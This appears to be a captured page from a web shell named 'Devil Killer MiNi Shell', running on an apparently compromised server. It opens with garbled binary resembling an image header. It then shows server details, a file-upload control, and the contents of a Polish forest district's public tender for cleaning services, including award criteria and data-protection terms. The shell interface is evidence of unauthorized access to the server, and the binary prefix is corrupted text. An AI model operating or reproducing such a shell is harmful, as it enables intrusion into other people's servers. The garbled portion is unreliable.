JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250918/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250918/0042994601-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Kompleksowa usługa sprzątania </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">NADLEŚNICTWO STUPOSIANY</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 370014538</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">1A</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Stuposiany</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">38-713</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">podkarpackie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL821 - Krośnieński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">134610010</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">stuposiany@krosno.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.gov.pl/web/nadlesnictwo-stuposiany</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Kompleksowa usługa sprzątania </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-0bd5a8fe-adf7-412f-951f-d88039e92d7e</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00429946</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-18</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00034678/04/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.3 Kompleksowa usługa sprzątania</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/pn/lasy_stuposiany <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/pn/lasy_stuposiany</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Komunikacja między Zamawiającym,<br/>a Wykonawcami w niniejszym postępowaniu odbywa się przy użyciu platformy zakupowej Open Nexus - platformazakupowa.pl<br/>(dalej: „Platforma”): https://platformazakupowa.pl/pn/lasy_stuposiany lub przy użyciu poczty elektronicznej:<br/>stuposiany@krosno.lasy.gov.pl, z zastrzeżeniem, że złożenie oferty, oświadczenia o niepodleganiu wykluczeniu i spełnianiu<br/>warunków udziału w postępowaniu, a także innych oświadczeń lub dokumentów składanych wraz z ofertą następuje wyłącznie przy<br/>użyciu Platformy.<br/><br/>Wymagania techniczne i organizacyjne dotyczące w szczególności logowania, składania ofert, składania wniosków o wyjaśnienie<br/>treści SWZ, wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów i oświadczeń oraz innych<br/>informacji przekazywanych przy ich użyciu opisane zostały w Instrukcji korzystania z Platformy<br/>https://platformazakupowa.pl/strona/45-instrukcje , w zakładce „Instrukcje dla Wykonawców” oraz w Regulaminie korzystania z<br/>Platformy, dostępnym pod adresem: https://platformazakupowa.pl/strona/1-regulamin .<br/>Wykonawca, przystępując do niniejszego postępowania o udzielenie zamówienia publicznego akceptuje warunki korzystania z<br/>Platformy określone w Regulaminie zamieszczonym na stronie internetowej pod wskazanym wyżej linkiem, w zakładce „Regulamin”<br/>oraz uznaje go za wiążący, a ponadto powinien zapoznać się z Instrukcją składania ofert/wniosków dostępną pod wskazanym wyżej<br/>linkiem, i stosować do niej.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. W związku z rozpoczęciem obowiązywania z dniem 25 maja 2018 r. Rozporządzenia<br/>Parlamentu Europejskiego i Rady Unii Europejskiej 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy<br/>95/46/WE (dalej nazwa RODO), stosownie do wymogów wynikających z art. 13 ust. 1 i ust. 2 tego aktu prawnego informujemy, że<br/>administratorem Państwa danych osobowych jest Nadleśnictwo Stuposiany z siedzibą Stuposiany 1A. Przedstawicielem<br/>administratora jest: Nadleśniczy – Ewa Tkacz.<br/>2. Z administratorem można skontaktować się: osobiście w siedzibie Nadleśnictwa Stuposiany telefonicznie pod numerem 13 461 00<br/>10, za pomocą poczty elektronicznej e-mail pod adresem: ewa.tkacz@krosno.lasy.gov.pl . Administrator nie wyznaczył Inspektora<br/>Ochrony Danych Osobowych.<br/>3. Przetwarzanie Państwa danych osobowych jest dokonywane w celu prawidłowej realizacji obowiązków ustawowych tj.<br/>przeprowadzenia postępowania o udzielenie zamówienia publicznego i zawarcia umowy z wybranym wykonawcą. Dane osobowe są<br/>przetwarzane na podstawie prawnej art. 6 ust. 1 lit. b) i lit. c) RODO. Podanie danych jest dobrowolne, ale jest warunkiem wzięcia<br/>udziału w postępowaniu o udzielenie zamówienia publicznego oraz zawarcia umowy.<br/>4. Odbiorcami Państwa danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ust. 1 i 2 ustawy z dnia 11 września 2019 r. – Prawo zamówień publicznych (t. j. Dz. U. z 2024 poz.<br/>1320), dalej „ustawa Pzp”.<br/>5. Państwa dane osobowe mogą być przekazywane do organów państwowych (np. Policja, prokuratura) prowadzących<br/>postępowania (np. karne, o wykroczenia). Dane mogą być również przekazywane kancelarii prawnej prowadzącej obsługę prawną<br/>Nadleśnictwa, jak również do jednostek nadrzędnych Lasów Państwowych w szczególności do RDLP w Krośnie oraz DGLP.<br/>Ponadto dane osobowe będą udostępniane łącznie z dokumentacją dotyczącą postępowania o udzielenie zamówienia publicznego<br/>w przypadkach składania wniosków o udostępnienie informacji publicznej.<br/>6. Państwa dane osobowe są przetwarzane ręcznie oraz elektronicznie za pomocą Systemu Informatycznego Lasów Państwowych.<br/>Dane osobowe są i będą przetwarzane przez okres czasu wyznaczony przepisami o rachunkowości – nie dłużej niż 6 lat licząc od<br/>wystawienia ostatniej faktury, jak również wyznaczony przepisami kodeksu cywilnego o przedawnieniu roszczeń – podstawowy<br/>termin 6 lat od wymagalności roszczenia, jak również przez okres czasu wyznaczony przepisami (w tym wewnętrznymi) o<br/>archiwizacji dokumentów – w zależności od tego, który z tych okresów będzie najdłuższy.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">7. W związku z przetwarzaniem danych osobowych przysługuje Państwu prawo do:<br/>1) żądania od Administratora, na podstawie art. 15 RODO, dostępu do Pani/Pana danych osobowych,<br/>2) żądania od Administratora, na podstawie art. 16 RODO, sprostowania Pani/Pana danych osobowych.<br/>3) żądania od Administratora, na podstawie art. 18 RODO, ograniczenia przetwarzania Pani/Pana danych osobowych z<br/>zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO,<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy Pani/Pan uzna, że przetwarzanie Pani/Pana<br/>danych osobowych narusza przepisy RODO.<br/>8. W związku z przetwarzaniem danych osobowych przysługuje Państwu nie przysługuje Państwu prawo do:<br/>1) żądania od Administratora, na podstawie art. 17 ust. 3 lit. b, d lub e RODO, usunięcia Pani/Pana danych osobowych;<br/>2) prawo do przenoszenia danych osobowych o którym mowa w art. 20 RODO;<br/>3) prawo sprzeciwu, na podstawie art. 21 RODO, wobec przetwarzania danych osobowych , gdyż podstawą prawną przetwarzania<br/>Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>9. Stosownie do wymogów wynikających z przepisu art. 19 ust. 4 ustawy Pzp, Zamawiający informuje, że:<br/>1) W przypadku gdy wniesienie żądania dotyczącego prawa, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, spowoduje<br/>ograniczenie przetwarzania danych osobowych zawartych w protokole postępowania lub załącznikach do tego protokołu, od dnia<br/>zakończenia postępowania o udzielenie zamówienia zamawiający nie udostępnia tych danych, chyba że zachodzą przesłanki, o<br/>których mowa w art. 18 ust. 2 rozporządzenia 2016/679. (art. 74 ust. 3 ustawy Pzp)<br/>2) Udostępnianie protokołu ma zastosowanie do wszystkich danych osobowych, z wyjątkiem danych, o których mowa w art. 9 ust. 1<br/>rozporządzenia 2016/679, zebranych w toku postępowania o udzielenie zamówienia. Ograniczenia zasady jawności, o których mowa<br/>w ust. 3 i art. 18 ust. 3–6, stosuje się odpowiednio. (art. 74 ust. 4 ustawy Pzp)<br/>3) W przypadku korzystania przez osobę, której dane osobowe są przetwarzane przez Zamawiającego, z uprawnienia, o którym<br/>mowa w art. 15 ust. 1–3 rozporządzenia 2016/679, Zamawiający może żądać od osoby występującej z żądaniem wskazania<br/>dodatkowych informacji, mających na celu sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie zamówienia.<br/>(art.75 ustawy Pzp)<br/>4) Skorzystanie przez osobę, której dane osobowe są przetwarzane, z uprawnienia do sprostowania lub uzupełnienia danych<br/>osobowych, o którym mowa w art. 16 rozporządzenia 2016/679, nie może naruszać integralności protokołu postępowania oraz jego<br/>załączników. (art. 76 ustawy Pzp)<br/>5) Zgłoszenie żądania ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza<br/>przetwarzania danych osobowych do czasu zakończenia tego postępowania.(art. 19 ust. 3 ustawy Pzp)<br/>6) W przypadku danych osobowych zamieszczonych przez zamawiającego w Biuletynie Zamówień Publicznych, prawa, o których<br/>mowa w art. 15 i art. 16 rozporządzenia 2016/679, są wykonywane w drodze żądania skierowanego do zamawiającego. (art. 269<br/>ust. 2 ustawy Pzp).<br/>10. Administrator dokłada wszelkich starań, aby zapewnić wszelkie środki fizycznej, technicznej i organizacyjnej ochrony danych<br/>osobowych przed ich przypadkowym czy umyślnym zniszczeniem, przypadkową utratą, zmianą, nieuprawnionym ujawnieniem,<br/>wykorzystaniem czy dostępem, zgodnie ze wszystkimi obowiązującymi przepisami.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">270.1.4.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Część 1 - Kompleksowa usługa sprzątania budynku administracyjno-biurowego <br/>stanowiącego siedzibę Nadleśnictwa Stuposiany oraz toalety publicznej.<br/>Miejsce realizacji – usługa sprzątania budynku administracyjno-biurowego <br/>stanowiącego siedzibę Nadleśnictwa Stuposiany w m. Stuposiany Nr 1A oraz toaleta publiczna na miejscu postojowym<br/>„Hłynny” gm. Lutowiska zlokalizowane odpowiednio na działce ew. nr 42 i 26 obręb ew. Stuposiany.<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 1 i 1a do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90910000-9 - Usługi sprzątania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90911200-8 - Usługi sprzątania budynków</p> <p class="mb-0">90919200-4 - Usługi sprzątania biur</p> <p class="mb-0">98390000-3 - Inne usługi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Cena oferty brutto powinna obejmować wszystkie koszty związane z wykonaniem przedmiotu<br/>zamówienia, warunkami stawianymi przez Zamawiającego oraz ewentualne ryzyko wynikające z okoliczności, które można było<br/>przewidzieć w terminie opracowywania oferty do czasu jej złożenia.<br/>2. Cena oferty musi być podana w złotych polskich (PLN) cyfrowo (z dokładnością do dwóch miejsc po przecinku) i słownie, z<br/>wyodrębnieniem podatku VAT wg formularza oferty (wzór stanowi załącznik nr 2 do SWZ). Cena oferty może być tylko jedna.<br/>Przy dokonywaniu wyboru najkorzystniejszej oferty Zamawiający kierować się będzie następującymi kryteriami:<br/>– Cena – 70%<br/><br/>– Realizacja przedmiotu zamówienia przy pomocy osób stale zamieszkałych na terenie Gminy Lutowiska lub Czarna – 30%<br/>2. W ramach każdego z powyższych kryteriów można otrzymać maksymalnie 100 pkt, co po przeliczeniu przez odpowiednia wagę<br/>procentową oznacza, że w kryterium „Cena” można otrzymać maksymalnie 70 pkt, natomiast w kryterium „Realizacja przedmiotu<br/>zamówienia przy pomocy osób stale zamieszkałych na terenie Gminy Lutowiska lub Czarna” można otrzymać maksymalnie 30 pkt.<br/>3. Ocenie będą podlegać wyłącznie oferty niepodlegające odrzuceniu. Ocena ofert będzie się odbywać według zasad opisanych w<br/>ust. 4 poniżej.<br/>4. Oferty będą oceniane wg następującego wzoru:<br/>1) W ramach kryterium „Cena” oceniana będzie cena łączna brutto podana w formularzu oferty. Ocena ofert w tym kryterium<br/>zostanie dokonana przy zastosowaniu poniższego wzoru:<br/>Cmin<br/>C = ------------------ x 100 pkt x 70%<br/>Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”<br/>Cmin - najniższa cena spośród ofert ocenianych<br/>Co - cena oferty ocenianej<br/>2) W ramach kryterium „Realizacja przedmiotu zamówienia przy pomocy osób stale zamieszkałych na terenie Gminy Lutowiska lub<br/>Czarna”:<br/>Zamawiający, jako jedno z kryteriów oceny ofert przyjmuje kryterium społeczne, polegające na przyjęciu przez Wykonawcę, w<br/>złożonej ofercie, zobowiązania<br/>do wykonania przedmiotu umowy przy pomocy osób stale zamieszkałych na terenie Gminy Lutowiska lub Czarna (powiat<br/>bieszczadzki).<br/>- Dla części 1: Wykonawca otrzyma: 30 punktów za zadeklarowaną osobę. Maksymalnie Wykonawca może otrzymać 30 punktów.<br/>W formularzu ofert Wykonawca poda liczbę osób, które będą realizowały przedmiot zamówienia. W przypadku, gdy Wykonawca w<br/>formularzu oferty poda liczbę 0 (zero) lub w ogóle nie wypełni formularza w tej części, otrzyma 0 punktów w przedmiotowym<br/>kryterium;<br/>- Dla części 2: Wykonawca otrzyma: 10 punktów za każdą zadeklarowaną osobę. Maksymalnie Wykonawca może otrzymać 30<br/>punktów. W formularzu ofert Wykonawca poda liczbę osób, które będą realizowały przedmiot zamówienia. W przypadku, gdy<br/>Wykonawca w formularzu oferty poda liczbę 0 (zero) lub w ogóle nie wypełni formularza w tej części, otrzyma 0 punktów w<br/>przedmiotowym kryterium;<br/>1 Zamawiający zastrzega, że wszystkie osoby wskazane w ofercie, powinny być zatrudnione na podstawie umowy o pracę w<br/>rozumieniu przepisów Kodeksu pracy;<br/>2 Zamawiający informuje jednocześnie, że Wykonawcy nie są obowiązani wykazywać zatrudnienia takich osób już na etapie<br/>składania ofert. Zatrudnienie jest wymagane na okres realizacji umowy w sprawie zamówienia publicznego;<br/>3 Wymóg zatrudnienia będzie zachowany, w przypadku złożenia oświadczenia przez Wykonawcę stale zamieszkałego na terenie<br/>Gminy Lutowiska lub Czarna o osobistym świadczeniu usług.<br/>4. Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów.<br/>Oferta może uzyskać maksymalnie 100 punktów.<br/>5. Wszystkie obliczenia będą dokonywane z dokładnością do dwóch miejsc po przecinku.<br/>6. Suma punktów uzyskanych za wszystkie kryteria oceny stanowić będzie końcową ocenę danej oferty.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Realizacja przedmiotu zamówienia przy pomocy osób stale zamieszkałych na terenie Gminy Lutowiska lub Czarna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Miejsce realizacji - Muczne gm. Lutowiska – Centrum Promocji Leśnictwa zlokalizowane na działce ew. nr 6, 7, 8, 9 i 10<br/>obręb ew. Muczne.<br/>Szczegółowy opis przedmiotu zamówienia zawarty jest w załączniku nr 1 i 1a do SWZ </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">90910000-9 - Usługi sprzątania</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">90911200-8 - Usługi sprzątania budynków</p> <p class="mb-0">90911100-7 - Usługi sprzątania miejsc noclegowych</p> <p class="mb-0">90911300-9 - Usługi czyszczenia okien</p> <p class="mb-0">90914000-7 - Usługi sprzątania parkingów</p> <p class="mb-0">90620000-9 - Usługi odśnieżania</p> <p class="mb-0">98390000-3 - Inne usługi</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2027-03-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">70</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Realizacja przedmiotu zamówienia przy pomocy osób stale zamieszkałych na terenie Gminy Lutowiska lub Czarna</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span 